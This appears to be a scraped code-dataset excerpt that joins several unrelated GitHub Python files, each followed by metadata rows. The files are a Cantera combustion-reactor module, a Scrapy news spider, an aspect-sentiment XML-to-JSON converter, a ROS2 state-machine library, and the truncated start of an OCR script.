        # Solver tolerances and maximum internal steps per integrate() call.
        self.rtol = rtol
        self.atol = atol
        self.n_iter = n_iter
    def _get_solver(self, gas: ct.Solution, inital_condition: np.ndarray) -> integrate.ode:
        """
        Build and configure the lsoda ODE solver for an IDT case.
        The initial condition vector is [T, Y_1, ..., Y_K].
        """
        ODE = ConstantMassPressureODE(gas)
        solver = integrate.ode(ODE)
        solver.set_integrator('lsoda', method='bdf', rtol=self.rtol, atol=self.atol, with_jacobian=False, nsteps=self.n_iter)
        solver.set_initial_value(inital_condition, 0.0)
        return solver
    def _get_header(self, gas: ct.Solution) -> str:
        # Column header matching the layout produced by get_norm_states().
        return "time(s),T,P," + ",".join(["X_" + spc.name for spc in gas.species()])
    def get_idt(self, gas: ct.Solution,
                max_time: float = 5.0,
                dt: float = 10**-7,
                flag: str = 'T',
                temp_rise: float = 400.0) -> float:
        """
        Find the idt time (first instant T exceeds T0 + temp_rise).
        This returns a float. If an error is raised by solver problems, it
        returns -1.0; if no IDT is found in the time window, returns -2.0.
        The *flag* argument is currently unused (only the temperature-rise
        criterion is implemented).
        """
        # TODO: Add the species flag. For a peak, run up to the max time.
        # Prepare the initial conditions
        initial_condition = np.array([gas.T, *gas.Y])
        temperature_flag = temp_rise + initial_condition[0]
        # Set the solver
        solver = self._get_solver(gas, initial_condition)
        # solve
        try:
            while solver.successful() and solver.t <= max_time:
                if solver.y[0] >= temperature_flag:
                    return solver.t
                solver.integrate(solver.t + dt)
        # catch any temperature problem (deliberate best-effort: errors map to -1.0)
        except:
            return -1.0
        # if we do not find a IDT in the max_time
        return -2.0
    def get_norm_states(self, gas: ct.Solution, idt: float,
                        norm_dt: float = 0.01,
                        max_norm_time: float = 2.0) -> Tuple[np.ndarray, str]:
        """
        Solve the idt reactor at every norm_dt (time normalized by the IDT)
        and return the real-time conditions.
        Returns a np.ndarray containing the values and a str containing the
        header: time(s), T, P, X_<spc names>.
        """
        initial_condition = np.array([gas.T, *gas.Y])
        const_pressure = copy(gas.P)
        n_points = int(max_norm_time / norm_dt + 1)
        out_solution = np.zeros([n_points, 3 + gas.n_species])
        # first row holds the initial state (time column stays 0)
        out_solution[0, 1], out_solution[0, 2] = gas.T, gas.P
        out_solution[0, 3:] = gas.X
        # Set the solver
        solver = self._get_solver(gas, initial_condition)
        # set control parameters: step and horizon scale with the IDT
        dt = norm_dt * idt
        max_time = max_norm_time * idt
        cur_point = 0
        try:
            while solver.successful():
                cur_point += 1
                solver.integrate(solver.t + dt)
                # for the output to be in molar fraction
                gas.TPY = solver.y[0], const_pressure, solver.y[1:]
                out_solution[cur_point, 0] = solver.t
                out_solution[cur_point, 1] = gas.T
                out_solution[cur_point, 2] = gas.P
                out_solution[cur_point, 3:] = gas.X
                if cur_point == n_points - 1:
                    break
            return out_solution, self._get_header(gas)
        except:
            raise Exception("Failed to solve the ODE. Try a different set of tolerances.")
    def solve(self, gas: ct.Solution,
              path_to_save: str = "",
              phi_for_file_name: float = None,
              norm_dt: float = 0.01,
              max_norm_time: float = 2.0,
              max_time_for_idt: float = 5.0,
              dt_for_idt: float = 10**-7,
              idt_flag: str = 'T',
              idt_temp_rise: float = 400.0) -> Tuple[float, np.ndarray, str]:
        """
        Solve the reactor, returning the IDT value, a np.ndarray with all
        conditions and the corresponding header.
        If a directory is passed as input, save the conditions to a file.
        The condition in the gas solution passed to this method is considered
        the initial condition.  Raises Exception when no IDT can be obtained.
        """
        init_TPY = copy(gas.TPY)
        idt = self.get_idt(gas, max_time=max_time_for_idt, dt=dt_for_idt, flag=idt_flag, temp_rise=idt_temp_rise)
        if idt <= 0.0:
            if idt == -2.0:
                raise Exception(f"It was not possble to obtain IDT. No IDT found in the time window.")
            raise Exception(f"It was not possble to obtain IDT. Solver problems found.")
        # restore the initial state before re-integrating for the profiles
        gas.TPY = init_TPY
        states, header = self.get_norm_states(gas, idt, norm_dt=norm_dt, max_norm_time=max_norm_time)
        # check for save flag:
        if path_to_save != "":
            f_name = create_solution_file_name("IDT", init_TPY[0], init_TPY[1], phi_for_file_name)
            save_solution_to_file(path_to_save + f_name, f"IDT_{idt_flag}_{idt_temp_rise:.2f}", idt, header, states)
        return idt, states, header
# --------------------------------------------------------------------------------------------------
# LFS implementation
class LFSReactor:
    """
    Class implementation of an 1D reactor (cantera FreeFlame) to obtain
    the LFS (laminar flame speed) value.
    """
    def __init__(self, width: float = 0.014,
                 ratio: float=3,
                 slope: float=0.1,
                 curve: float=0.1,
                 max_time_step_count: int = 5000,
                 loglevel: int = 0) -> None:
        # Domain width [m] and cantera grid-refinement criteria.
        self.width = width
        self.ratio = ratio
        self.slope = slope
        self.curve = curve
        self.max_time_step_count = max_time_step_count
        self.loglevel = loglevel
    def _get_header(self, gas: ct.Solution) -> str:
        # NOTE(review): the first column is the grid position in meters,
        # but the header label says "grid(s)" — probably should be grid(m).
        return "grid(s),T,P," + ",".join(["X_" + spc.name for spc in gas.species()])
    def _get_states(self, flame: ct.FreeFlame) -> np.ndarray:
        """
        Return the states of the current flame, one row per grid point:
        grid(m), T, P, X_<species>
        """
        out_data = np.zeros([len(flame.T),len(flame.X) + 3])
        out_data[:,0] = flame.grid
        out_data[:,1] = flame.T
        out_data[:,2] = flame.P
        # flame.X is indexed [species, grid point]; copy one species column at a time
        for i in range(len(flame.X)):
            out_data[:,3 + i] = flame.X[i]
        return out_data
    def solve(self, gas: ct.Solution,
              path_to_save: str = "",
              phi_for_file_name: float = None) -> Tuple[float, np.ndarray, str]:
        """
        Solve the reactor, returning the LFS value (inlet velocity, m/s), a
        np.ndarray with all conditions and the corresponding header.
        If a directory is passed as input, save the conditions to a file.
        The condition in the gas solution passed to this method is considered
        the initial condition.
        """
        init_TPY = copy(gas.TPY)
        # Create the flame object
        flame = ct.FreeFlame(gas, width=self.width)
        # flame.transport_model = 'Mix'
        # Define tolerances for the solver
        flame.set_refine_criteria(ratio=self.ratio, slope=self.slope, curve=self.curve)
        flame.max_time_step_count = self.max_time_step_count
        # Define logging level
        flame.solve(loglevel=self.loglevel, auto=True)
        # Laminar flame speed = gas velocity at the unburned (inlet) boundary.
        Su0 = flame.velocity[0]
        states = self._get_states(flame)
        header = self._get_header(gas)
        # check for save flag:
        if path_to_save != "":
            f_name = create_solution_file_name("LFS", init_TPY[0], init_TPY[1], phi_for_file_name)
            save_solution_to_file(path_to_save + f_name, f"LFS_m_s", Su0, header, states)
        return Su0, states, header
| fingeraugusto/red_app | src/reactors.py | reactors.py | py | 11,199 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.ndarray",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "cantera.one_atm",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "cantera.Solution",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "cantera... |
18206090350 | from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.spiders import CrawlSpider # Rule
from scrapy.http.request import Request
import html2text
import time
import re
import dateutil.parser
import datetime
import urlparse
from buzz_crawler.items import BuzzCrawlerItem
from markdown import markdown
class WozSpider(CrawlSpider):
    """Scrapy crawler for articles on www.woz.ch.

    parse() collects article links from the front page; handle_blog()
    extracts each article into a BuzzCrawlerItem (title, blurb, content
    converted HTML -> text -> markdown HTML).

    NOTE(review): uses the Python 2 ``urlparse`` module and legacy
    ``HtmlXPathSelector`` API — this spider predates scrapy's Selector.
    """
    name = 'woz'
    allowed_domains = ['www.woz.ch']
    start_urls = ['http://www.woz.ch/']
    def handle_blog(self, response):
        """Extract one article page into a BuzzCrawlerItem."""
        hxs = HtmlXPathSelector(response)
        item = BuzzCrawlerItem()
        item['url'] = response.url
        item['date'] = datetime.datetime.now()  # crawl time, not publication date
        item['title'] = hxs.xpath(".//*[@id='container']/div/div/article/header/h1/text()").extract()[0].strip()
        item['blurb'] = hxs.xpath(".//*[@id='container']/div/div/article/header/h2/text()").extract()[0].strip()
        unprocessed_content = hxs.xpath("//div[@class='article-content']").extract()[0].strip()
        # Strip links/images while converting HTML to plain text, then
        # re-render the text as HTML via markdown.
        h = html2text.HTML2Text()
        h.ignore_links = True
        h.ignore_images = True
        processed_content = h.handle(unprocessed_content)
        item['content'] = markdown(processed_content)
        item['source'] = 'woz.ch'
        yield item
    def parse(self, response):
        """Follow every article link found on the start page."""
        hxs = HtmlXPathSelector(response)
        posts = hxs.xpath(".//*[@id='container']/div/div/article")
        for post in posts:
            post_link = post.xpath("a/@href").extract()[0]
            post_absolute_url = urlparse.urljoin(response.url, post_link.strip())
            yield Request(post_absolute_url, self.handle_blog)
| claudehenchoz/z4 | buzz_crawler/buzz_crawler/spiders/woz_spider.py | woz_spider.py | py | 1,600 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrapy.contrib.spiders.CrawlSpider",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "scrapy.selector.HtmlXPathSelector",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "buzz_crawler.items.BuzzCrawlerItem",
"line_number": 21,
"usage_type"... |
13859467294 | import xml.etree.ElementTree as ET
import json
# Absolute paths to the raw SemEval-2016 laptop-domain ABSA XML files.
# NOTE(review): machine-specific Windows paths — consider making configurable.
path_train = "D:/code/prompt-ABSA/dataset/original data/ABSA16_Laptops_Train_SB1_v2.xml"
path_test = 'D:/code/prompt-ABSA/dataset/original data/EN_LAPT_SB1_TEST_.xml'
# Dataset "territory" label used to build the JSON output paths.
terr = 'laptops16'
def get_path(territory, data_type):
    """Return the JSON output path for the given dataset territory and split."""
    return './dataset/data/{}/{}.json'.format(territory, data_type)
def judge(p):
    """Return False iff two opinions in *p* share a category but disagree
    on polarity (i.e. the sentence is polarity-inconsistent); True otherwise.

    O(n) single pass with a category->first-polarity map, replacing the
    original O(n^2) pairwise scan; semantics are unchanged.
    """
    first_polarity = {}
    for opinion in p:
        category, polarity = opinion['category'], opinion['polarity']
        if first_polarity.setdefault(category, polarity) != polarity:
            return False
    return True
def extract_data(path):
    """Parse a SemEval-style ABSA XML file.

    Expects the hierarchy root > review > sentences > sentence, where each
    sentence holds one <text> child and zero or more <Opinion> elements
    with ``category``/``polarity`` attributes.

    Sentences with no opinion, and sentences where a single category
    carries conflicting polarities, are dropped (same filter as before).

    Returns ``[n_category, category, data]`` where *category* lists the
    distinct categories in first-appearance order, *n_category* is its
    length (the original kept a redundant manual counter), and each entry
    of *data* is ``[sentence_text, {'category':..., 'polarity':...}, ...]``.
    """
    root = ET.parse(path).getroot()
    data = []
    for review in root:
        for sentences in review:
            for sentence in sentences:
                piece = [t.text for t in sentence.iter('text')]
                piece.extend(
                    {'category': o.attrib['category'], 'polarity': o.attrib['polarity']}
                    for o in sentence.iter('Opinion')
                )
                if len(piece) > 1 and _polarity_consistent(piece[1:]):
                    data.append(piece)
    # Collect distinct categories in first-appearance order (by key, not by
    # relying on dict.values() ordering as the original did).
    category = []
    for piece in data:
        for opinion in piece[1:]:
            if opinion['category'] not in category:
                category.append(opinion['category'])
    return [len(category), category, data]


def _polarity_consistent(opinions):
    """True iff no category appears with two different polarities."""
    seen = {}
    for op in opinions:
        if seen.setdefault(op['category'], op['polarity']) != op['polarity']:
            return False
    return True
# Extract both splits from the raw XML files.
train_data = extract_data(path_train)
test_data = extract_data(path_test)
# Remove from the test split every category that appears in test but not in train.
over_list = [elem for elem in test_data[1] if elem not in train_data[1]]
# Sentences in test that mention any of those train-unseen categories.
move_list = [elem for cate in over_list for elem in test_data[2] for e in elem[1:] if e['category'] == cate]
test_data[2] = [elem for elem in test_data[2] if elem not in move_list]
test_data[1] = [elem for elem in test_data[1] if elem not in over_list]
test_data[0] = len(test_data[1])  # keep the category count consistent after filtering
print(over_list)
# Persist both splits as JSON under ./dataset/data/<terr>/.
with open(get_path(terr, 'train'), 'w', encoding='utf-8') as f:
    json.dump(train_data, f)
with open(get_path(terr, 'test'), 'w', encoding='utf-8') as f:
    json.dump(test_data, f)
| lazy-cat2233/PBJM | data_from_xml.py | data_from_xml.py | py | 2,285 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "xml.etree.ElementTree.parse",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "json.dump",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "json.dump... |
31515158551 | """Basic state machine implementation."""
# pylint: disable=unnecessary-pass, too-many-instance-attributes
from typing import Iterable, Union
from rclpy import logging
from rclpy.node import Node
from rclpy.time import Time, Duration
LOGGER = logging.get_logger("behavior")
class Resource:
    """Ownership tracker for a shared, named resource.

    States acquire the resources they need when they start; ownership is
    dropped automatically when they stop.  A plain Resource may be held by
    several states simultaneously, while the UniqueResource subclass logs
    an error on concurrent acquisition.  The class-level registry maps each
    resource name to the set of its current owners.
    """

    _registry = {}

    def __init__(self, name: str):
        self._name = name
        if name in Resource._registry:
            LOGGER.error(f"Resource {name} already exists. "
                         "Different resources must have unique names.")
        Resource._registry[name] = set()

    def __del__(self):
        Resource._registry.pop(self._name)

    def get_name(self) -> str:
        """Name under which this resource is registered."""
        return self._name

    def get_owner(self):
        """Set of states currently holding this resource."""
        return Resource._registry[self._name]

    def is_free(self) -> bool:
        """True when no state currently owns the resource."""
        return not Resource._registry[self._name]

    def assign(self, owner: 'State') -> 'Resource':
        """Record *owner* as a holder of this resource; returns self."""
        owners = Resource._registry[self._name]
        if owner in owners:
            LOGGER.error(f"Resource {self._name} already owned by {owner}.")
        owners.add(owner)
        return self

    def transfer(self, old_owner: 'State', new_owner: 'State') -> 'Resource':
        """Move ownership from *old_owner* to *new_owner*; returns self."""
        owners = Resource._registry[self._name]
        if old_owner not in owners:
            LOGGER.error(f"Resource {self._name} not owned by {old_owner}.")
        owners.remove(old_owner)
        owners.add(new_owner)
        return self

    def free(self, owner: 'State'):
        """Drop *owner* from the owner set."""
        Resource._registry[self._name].remove(owner)

    @staticmethod
    def validate(*resources: str):
        """Log an error for every name that is not a registered resource."""
        for resource in resources:
            if resource not in Resource._registry:
                LOGGER.error(f"Resource {resource} does not exist. Invalid name.")
class UniqueResource(Resource):
    """A resource permitting at most one owning state at a time."""

    def assign(self, owner: 'State') -> Resource:
        """Record *owner*; logs an error if the resource is already held."""
        owners = Resource._registry[self._name]
        if owners:
            LOGGER.error(f"Resource {self._name} already owned by "
                         f"{Resource._registry[self._name]}.")
        owners.add(owner)
        return self
class State:
    """Superclass for states.

    A state acquires its required resources from its parent state machine
    when started and releases them when stopped.  Subclasses implement
    their behavior in step().  A state must be attached to an rclpy Node
    (via the constructor or set_node()) before start() is called.
    """
    def __init__(self, name,
                 node:Node = None,
                 resources:Iterable[str] = None,
                 parent:'StateMachine' = None):
        self._base_name = name
        self._name = name
        self._node = None
        self._running = False
        self._start_time = None
        self._required_resources = set() if resources is None else set(resources)
        self._parent = None
        self._resources = {}  # resource name -> Resource object currently held
        if node is not None:
            self._node = node
        if parent is not None:
            self.set_parent(parent)
    def set_node(self, node:Node):
        """Set the node for the state"""
        self._node = node
    def set_parent(self, parent:'StateMachine'):
        """Set the parent state machine (also qualifies this state's name)."""
        if self._parent is not None:
            LOGGER.error(f"State {self._name} already has parent.")
        if self._running:
            LOGGER.error(f"State {self._name} already running. "
                         "Cannot change parent.")
        self._parent = parent
        self._name = f"{parent.get_name()}/{self._base_name}"
    def get_base_name(self):
        """Get the base (unqualified) name of the state"""
        return self._base_name
    def get_name(self):
        """Get the full, parent-qualified name of the state"""
        return self._name
    def get_required_resources(self) -> Iterable[str]:
        """Get the set of required resource names"""
        return self._required_resources
    def add_required_resource(self, resource: Union[str, Iterable[str]]):
        """Add a required resource (a single name or an iterable of names)."""
        if self._running:
            LOGGER.error(f"State {self._name} already running. "
                         "Cannot add required resources.")
        if isinstance(resource, str):
            self._required_resources.add(resource)
        else:
            for res in resource:
                self._required_resources.add(res)
        # Requirements propagate upward so ancestors acquire them first.
        if self._parent is not None:
            self._parent.add_required_resource(resource)
    def get_start_time(self) -> Time:
        """Get the time the state started"""
        return self._start_time
    def get_current_time(self) -> Time:
        """Get the current time from the node's clock"""
        return self._node.get_clock().now()
    def get_elapsed_time(self) -> Duration:
        """Get the time the state has been running"""
        return self._node.get_clock().now() - self._start_time
    def get_node(self) -> Node:
        """Get the node for the state"""
        return self._node
    def start(self):
        """Start the state: acquire all required resources, record start time."""
        if self._node is None:
            LOGGER.error(f"State {self._name} must be run within a ros2 node. "
                         "Use set_node() to set the node.")
        if self._running:
            LOGGER.warning(f"State {self._name} already running")
        for resource in self._required_resources:
            self._acquire_resource(resource)
        self._running = True
        self._start_time = self._node.get_clock().now()
    def stop(self):
        """Stop the state and release all held resources."""
        if not self._running:
            LOGGER.warning(f"State {self._name} not running")
            return
        self._release_all_resources()
        self._running = False
    def step(self):
        """Do one step of the state (subclasses extend this)."""
        if not self._running:
            LOGGER.error(f"State {self._name} has not been started. Cannot step.")
    def get_resource(self, resource: str) -> Resource:
        """Get a held resource reference by name"""
        return self._resources[resource]
    def _acquire_resource(self, resource_name: str):
        """Acquire a resource from the parent."""
        if resource_name in self._resources:
            LOGGER.warning(f"Resource {resource_name} already acquired")
        resource = self._parent.get_resource(resource_name)
        # Unique resources move ownership; shared resources gain an owner.
        if isinstance(resource, UniqueResource):
            self._resources[resource_name] = resource.transfer(self._parent, self)
        else:
            self._resources[resource_name] = resource.assign(self)
    def _release_resource(self, resource_name: str):
        """Release a single resource back to the parent."""
        if resource_name not in self._resources:
            LOGGER.error(f"Resource {resource_name} not in resource list for "
                         f"{self.get_name()}.")
        resource = self._resources[resource_name]
        if isinstance(resource, UniqueResource):
            resource.transfer(self, self._parent)
        else:
            resource.free(self)
        # Bug fix: the original additionally executed
        #     self._resources[resource].transfer(self, self._parent)
        #     self._resources.pop(resource)
        # indexing the dict with the Resource *object* rather than its name,
        # which always raised KeyError and transferred ownership twice.
        self._resources.pop(resource_name)
    def _release_all_resources(self):
        """Release every held resource back to the parent."""
        for resource in self._resources.values():
            if isinstance(resource, UniqueResource):
                resource.transfer(self, self._parent)
            else:
                resource.free(self)
        self._resources.clear()
    def validate(self):
        """Validate the state's resource requirements."""
        if self._parent is None:
            # Only need to validate resource names at global level
            Resource.validate(*self._required_resources)
class Event:
    """An event that signals a transition between states.

    An event is enabled while its source state runs; update() refreshes and
    returns its boolean status.  Events compose with ~, & and | operators.
    """
    def __init__(self, name):
        self._name = name
        self._status = False
        self._enabled = False
        self._state = None  # state this event is currently enabled for
        self._required_resources = set()
        self.initialized = True # Some events might need additional info before
                                # being initialized such as subscriber events
    def get_name(self) -> str:
        """Get the name of the event"""
        return self._name
    def reset(self):
        """Reset the event status to False"""
        self._status = False
    def get_status(self) -> bool:
        """Get the status of the event without updating"""
        return self._status
    def update(self) -> bool:
        """Update the event and get its status (base class is a no-op)"""
        return self._status
    def add_required_resource(self, resource: Union[str, Iterable[str]]):
        """Add a required resource (a single name or an iterable of names)"""
        if isinstance(resource, str):
            self._required_resources.add(resource)
        else:
            for res in resource:
                self._required_resources.add(res)
    def get_required_resources(self) -> Iterable[str]:
        """Get the set of required resource names"""
        return self._required_resources
    def enable(self, state:State):
        """Called when the corresponding state is started"""
        if self._state is not None:
            LOGGER.error(f"Event {self._name} already enabled for state "
                         f"{self._state.get_name()}")
        self._state = state
        self._enabled = True
    def is_enabled(self) -> bool:
        """Check if the event is enabled"""
        return self._enabled
    def disable(self):
        """Called when the corresponding state is stopped"""
        self.reset()
        self._state = None
        self._enabled = False
    def __invert__(self) -> 'Event':
        # ~~e collapses back to e instead of double-wrapping.
        if isinstance(self, NotEvent):
            return self._e1
        return NotEvent(self)
    def __and__(self, other:'Event') -> 'Event':
        return AndEvent(self, other)
    def __or__(self, other:'Event') -> 'Event':
        return OrEvent(self, other)
class CompositeEvent(Event):
    """An event that is a combination of other events."""
    def __init__(self, name):
        super().__init__(name)
        self._events = set()
    def get_base_events(self) -> Iterable[Event]:
        """Returns the tracked events.

        NOTE(review): add_event() also inserts composite operands themselves
        into this set (only same-class composites are flattened), so the
        "non-composite" wording of the original doc does not always hold.
        """
        return self._events
    def add_event(self, event:'Event'):
        """Add an event (flattening same-class composites) and absorb its
        resource requirements."""
        if isinstance(event, self.__class__):
            self._events |= event.get_base_events()
        self._events.add(event)
        self._required_resources |= event.get_required_resources()
    def reset(self):
        """Reset every tracked event, then this event's own status."""
        for event in self._events:
            event.reset()
        self._status = False
    def update(self) -> bool:
        """Refresh every tracked event; subclasses combine their statuses."""
        for event in self._events:
            event.update()
        return self._status
    def enable(self, state:State):
        """Enable this event and every tracked event not already enabled."""
        super().enable(state)
        for event in self._events:
            if not event.is_enabled():
                event.enable(state)
class NotEvent(CompositeEvent):
    """Logical negation of a wrapped event: true when the base is false."""

    def __init__(self, event, name=None):
        if name is None:
            name = f"not_{event.get_name()}"
        super().__init__(name)
        self.add_event(event)
        self._e1 = event

    def update(self) -> bool:
        """Refresh the wrapped event and return its negated status.

        An uninitialized wrapped event reports False without touching status.
        """
        if self._e1.initialized:
            self._status = not self._e1.update()
            return self._status
        return False
class AndEvent(CompositeEvent):
    """Conjunction of two events: true only when both operands are true."""

    def __init__(self, event1, event2, name=None):
        if name is None:
            name = f"{event1.get_name()}_and_{event2.get_name()}"
        super().__init__(name)
        self.add_event(event1)
        self.add_event(event2)
        self._e1 = event1
        self._e2 = event2

    def update(self) -> bool:
        """Refresh every tracked event, then AND the operand statuses."""
        super().update()
        result = self._e1.get_status() and self._e2.get_status()
        self._status = result
        return result
class OrEvent(CompositeEvent):
    """Disjunction of two events: true when either operand is true."""

    def __init__(self, event1, event2, name=None):
        if name is None:
            name = f"{event1.get_name()}_or_{event2.get_name()}"
        super().__init__(name)
        self.add_event(event1)
        self.add_event(event2)
        self._e1 = event1
        self._e2 = event2

    def update(self) -> bool:
        """Refresh every tracked event, then OR the operand statuses."""
        super().update()
        result = self._e1.get_status() or self._e2.get_status()
        self._status = result
        return result
class StateMachine(State):
    """A basic state machine.

    States are registered with `add_state`, transitions with `add_transition`;
    `step` polls the active state's outgoing events and follows the first one
    that fires.
    """
    def __init__(self, name, node:Node = None):
        super().__init__(name, node=node)
        self._states = {}       # type: Dict[str,State]
        self._events = {}       # type: Dict[str,Event]  # event name -> Event
        self._transitions = {}  # type: Dict[str,Dict[str,str]] # from -> event -> to
        self._current_state = None
        self._start_state = None
    def set_node(self, node:Node):
        """Propagate the node to this machine and all of its states."""
        super().set_node(node)
        for state in self._states.values():
            state.set_node(node)
    def add_state(self, state:State):
        """Add a state to the state machine"""
        if state.get_base_name() in self._states:
            LOGGER.warning(f"State {state.get_base_name()} already in state "
                           "machine. Skipping.")
            return
        state.set_node(self._node)
        state.set_parent(self)
        self._states[state.get_base_name()] = state
        self._required_resources |= state.get_required_resources()
        # By default, the start state is the first state added
        if self._start_state is None:
            self._start_state = state.get_base_name()
    def add_transition(self,
                       from_state:Union[str,State],
                       event:Event,
                       to_state:Union[str,State]):
        """Add a transition triggered by `event` from `from_state` to `to_state`."""
        if isinstance(from_state, State):
            from_state = from_state.get_base_name()
        if isinstance(to_state, State):
            to_state = to_state.get_base_name()
        if from_state not in self._states:
            LOGGER.error(f"State {from_state} not in state machine. Invalid transition.")
        if to_state not in self._states:
            LOGGER.error(f"State {to_state} not in state machine. Invalid transition.")
        # Bug fix: the duplicate-transition check must consult the transition
        # table, not self._events. The original stored an empty dict in
        # self._events under the *state* name, corrupting the
        # event-name -> Event mapping used by _transition()/step().
        if from_state not in self._transitions:
            self._transitions[from_state] = {}
        elif event.get_name() in self._transitions[from_state]:
            LOGGER.warning(f"Transition from {from_state} on event {event} already exists. "
                           "Overwriting.")
        self._events[event.get_name()] = event
        self._transitions[from_state][event.get_name()] = to_state
        self._states[from_state].add_required_resource(event.get_required_resources())
    def set_start(self, state:Union[str,State]):
        """Set the start state"""
        if isinstance(state, State):
            state = state.get_base_name()
        if state not in self._states:
            LOGGER.error(f"State {state} not in state machine. Invalid start state.")
        self._start_state = state
    def _transition(self, state:Union[str,State]):
        """Transition to a new state"""
        if isinstance(state, State):
            state = state.get_base_name()
        if state not in self._states:
            LOGGER.error(f"State {state} not in state machine. Invalid transition.")
        if self._current_state is not None:
            # Disable the outgoing state's events before stopping it.
            for event in self.get_all_base_events():
                event.disable()
            self._current_state.stop()
        self._current_state = self._states[state]
        self._current_state.start()
        # Arm the events that can move us out of the new state.
        if self._current_state.get_base_name() in self._transitions:
            for event_name in self._transitions[self._current_state.get_base_name()]:
                event = self._events[event_name]
                event.enable(self._current_state)
        LOGGER.debug(f"Transitioned to state {state}")
        print (f"======Transitioned to state {state}======")
    def get_all_base_events(self, state=None) -> Iterable[Event]:
        """Recursively gets a set of all base events for a state"""
        if state is None:
            state = self._current_state
        events = set()
        if state.get_base_name() not in self._transitions:
            return events
        for event_name in self._transitions[state.get_base_name()]:
            event = self._events[event_name]
            # Composite events also contribute their underlying base events.
            if isinstance(event, CompositeEvent):
                events |= self._events[event_name].get_base_events()
            events.add(event)
        return events
    def start(self):
        """Start the state machine"""
        super().start()
        if self._start_state is None:
            return
        self._transition(self._start_state)
        LOGGER.debug(f"Started state machine {self._name}")
    def stop(self):
        """Stop the state machine"""
        if self._current_state is not None:
            for event in self.get_all_base_events():
                event.disable()
            self._current_state.stop()
        super().stop()
        LOGGER.debug(f"Stopped state machine {self._name}")
    def step(self):
        """Do one step of the state machine"""
        if self._current_state is None:
            return
        if self._current_state.get_base_name() in self._transitions:
            for event_name, to_state in self._transitions[
                    self._current_state.get_base_name()].items():
                if self._events[event_name].update():
                    self._node.get_logger().info(
                        f"{event_name}: {self._current_state.get_base_name()} -> {to_state}")
                    self._transition(to_state)
                    break
        self._current_state.step()
    def _check_reachability(self, start_state:str, reachable:set):
        """Recursively check reachability of states"""
        if start_state in reachable:
            return
        reachable.add(start_state)
        if start_state not in self._transitions:
            return
        for to_state in self._transitions[start_state].values():
            self._check_reachability(to_state, reachable)
    def validate(self):
        """Validates state machine construction to check for errors at initialization"""
        super().validate()
        if self._start_state is None:
            return
        # Recursively validate child state machines
        for state in self._states.values():
            state.validate()
        # Check reachability
        reachable = set()
        self._check_reachability(self._start_state, reachable)
        unreachable = set(self._states.keys()) - reachable
        if len(unreachable) > 0:
            LOGGER.warning(f"State machine {self._name} has unreachable states: {unreachable}")
        # Check resource sharing
        for state in self._states.values():
            missing_resources = state.get_required_resources() - self._required_resources
            if len(missing_resources) > 0:
                LOGGER.error(f"State {state.get_name()} requires resources {missing_resources} "
                             f"that are not provided by state machine {self._name}")
        for state, events in self._transitions.items():
            for event in events:
                missing_resources = (self._events[event].get_required_resources() -
                                     self._states[state].get_required_resources())
                if len(missing_resources) > 0:
                    # Bug fix: `state` is a name (str) here; look up the State
                    # object before calling get_name().
                    LOGGER.error(f"Event {event} requires resources {missing_resources} "
                                 f"that are not provided by state {self._states[state].get_name()}")
class StateMachineRoot(StateMachine):
    """A State Machine with no parent"""
    def __init__(self, node:Node):
        # The root is named "/" by convention.
        super().__init__("/", node)
    def new_resource(self, resource:Resource):
        """Add a new resource to the state machine"""
        # The root both requires the resource and owns its assignment.
        self.add_required_resource(resource.get_name())
        self._resources[resource.get_name()] = resource.assign(self)
    def set_parent(self, parent):
        # The root never has a parent; log instead of silently accepting one.
        LOGGER.error("Cannot set parent of root state machine")
    def _acquire_resource(self, resource_name):
        # No-op: acquisition from a parent does not apply at the root.
        pass
    def _release_resource(self, resource_name):
        # No-op: see _acquire_resource.
        pass
    def _release_all_resources(self):
        # No-op: see _acquire_resource.
        pass
class ParallelState(State):
    """A state that runs multiple states in parallel"""
    def __init__(self, name, node:Node = None, states:Iterable[State] = None):
        super().__init__(name, node)
        self._states = []
        if states is not None:
            for state in states:
                self.add_state(state)
    def add_state(self, state):
        """Add a state to the parallel state"""
        self._states.append(state)
        state.set_node(self._node)
        # Bug fix: the parent must be this state, not its resource dict
        # (matches StateMachine.add_state).
        state.set_parent(self)
        self._required_resources |= state.get_required_resources()
        # If we are already running, bring the new child up immediately.
        if self._running:
            state.start()
    def start(self):
        """Start the parallel state"""
        super().start()
        for state in self._states:
            state.start()
    def stop(self):
        """Stop the parallel state"""
        for state in self._states:
            state.stop()
        super().stop()
    def step(self):
        """Do one step of the parallel state"""
        super().step()
        for state in self._states:
            state.step()
    def validate(self):
        """Validate children and warn about shared unique resources."""
        super().validate()
        # Validate child states
        for state in self._states:
            state.validate()
        # Check resource sharing
        resource_counts = {}
        for state in self._states:
            for resource in state.get_required_resources():
                if resource not in resource_counts:
                    resource_counts[resource] = 0
                resource_counts[resource] += 1
        for resource, count in resource_counts.items():
            # NOTE(review): required resources appear to be names (strings)
            # elsewhere (see StateMachineRoot.new_resource), so this
            # isinstance check may never trigger -- confirm.
            if count > 1 and isinstance(resource, UniqueResource):
                # Bug fix: added the missing space between "in" and "parallel"
                # in the warning message.
                LOGGER.warning(f"UniqueResource {resource} is shared by {count} states in "
                               f"parallel state {self._name}. This may cause runtime "
                               "errors or unexpected behavior.")
| LARG/spl-release | src/behavior/behavior/state_machine.py | state_machine.py | py | 22,719 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "rclpy.logging.get_logger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "rclpy.logging",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rclpy.node.Node",
"line_number": 86,
"usage_type": "name"
},
{
"api_name": "typing.Iterable"... |
1063868906 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from PIL import Image
from matplotlib import pyplot as plt
import numpy as np
import pytesseract
import cv2
import tkinter as tk
import logging
import time
import re
import threading
# Dimensioning values
# Global crop coordinates (pixels) that isolate the scoreboard overlay in a
# broadcast frame; tuned per match/broadcast layout.
left_x = 170
upper_y = 50
right_x = 540
